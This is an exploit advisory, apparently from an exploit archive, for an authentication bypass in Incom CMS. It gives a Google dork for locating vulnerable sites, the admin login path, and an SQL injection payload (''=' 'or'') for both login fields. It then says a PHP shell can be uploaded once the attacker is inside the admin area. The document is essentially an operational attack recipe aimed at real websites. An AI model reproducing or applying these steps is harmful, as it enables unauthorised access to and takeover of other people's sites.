Incom CMS suffers from an authentication bypass vulnerability via remote SQL injection.
28e1d1b127d9bf0b66f5bb5a2d7f99ee61b5bf34b4c66d93200d8b96697b8157
# Exploit Title: Incom Cms Admin Bypass Vulnerability
# Google Dork: intext:"incom cms" . intext:"site by overron" . intitle:"INCOM CMS"
# Date: 2014-12-29
# Exploit Author: Xodiak
# Vendor Homepage: http://facebook.com/xodiakbalckhat
# Software Link: http://incomcms.com
# Version: All Version
# Tested on: Kali , Windows
# CVE : N/A
Incom Cms Admin Bypass Vulnerability :
http://localhost/incomcms/_cm_admin/
Sometime You Get 403 Error Forbidden But Many Site Have This Vulnerability
After You Go In Admin Page Enter UserName & Password And Username And Password Is :
UserName : '=' 'or'
Password : '=' 'or'
And You Can Upload Your PHP Shell In Link Menu Without Any Authication
Special Tnx : Net-Hacker , Milad Hacking , MR.B3NY ,Seravo Black Hat , Mahdi.Hidden
MR.JOKER , MahdiYar , Mr.Cracker , Behrooz_Ice , Virangar , Ang3l--Demon , And All
Ashiyane Digital Securtiy Team , 2Ostad Members